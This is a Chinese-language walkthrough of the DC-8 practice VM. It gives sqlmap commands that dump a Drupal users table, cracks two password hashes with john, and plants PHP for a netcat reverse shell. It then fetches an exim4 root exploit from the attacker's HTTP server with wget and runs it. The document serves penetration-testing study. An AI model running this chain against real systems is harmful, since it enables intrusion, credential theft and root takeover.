主机DC-8

主机DC-8

信息收集

扫描IP

扫描端口

技术栈：

有远程代码执行漏洞，sql注入

扫描目录：

python3 dirsearch.py -u http://192.168.222.136 -i 200

• -i 指定状态码

输入单引号报错

sqlmap跑数据的时候，先跑库，再拿着库名dump！

sqlmap跑一下！，注意别一上来--dump，跑太久，数据太多

sqlmap -u http://192.168.222.136/?nid=* --batch -dbs

sqlmap -u http://192.168.222.136/?nid=2 -D d7db -T users -C name,pass,login --dump --batch

-D:指定数据库

-T:指定表

-C:指定字段

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

这两个加密方式是Drupal 加密算法 $$前缀Drupal独有

john解密

echo '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z' > pass

echo '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF' >> pass

john pass

只得到一个密码，不知道是谁的，都试一下。join成功登录

直接写入恶意php代码，进行代码执行nc远程连接

点击保存后，返回Contact Us，填写信息提交，即可反弹shell

提权测试

导入一个终端

python -c "import pty;pty.spawn('/bin/bash')"

找特权文件

find / -type f -perm -u=s 2>/dev/null

usr/sbin/exim4 --version

然后版本的漏洞

把脚本下载下来

searchsploit -m 46996.sh

kali端开启http服务

python3 -m http.server 8080

靶机端：

wget 192.168.222.129:8080/46996.sh

在kali端编辑一下脚本的格式，重新上传

靶机端下载，授权执行

wget 192.168.222.129:8080/46996.sh

chmod 777 46996.sh

./46996.sh -m netcat

注意

执行脚本时，不可以直接执行，后面要带参数(脚本要求）

-m netcat，作用是指定脚本以netcat（nc）模式运行

使用的时候可以看一下使用说明

直接执行失败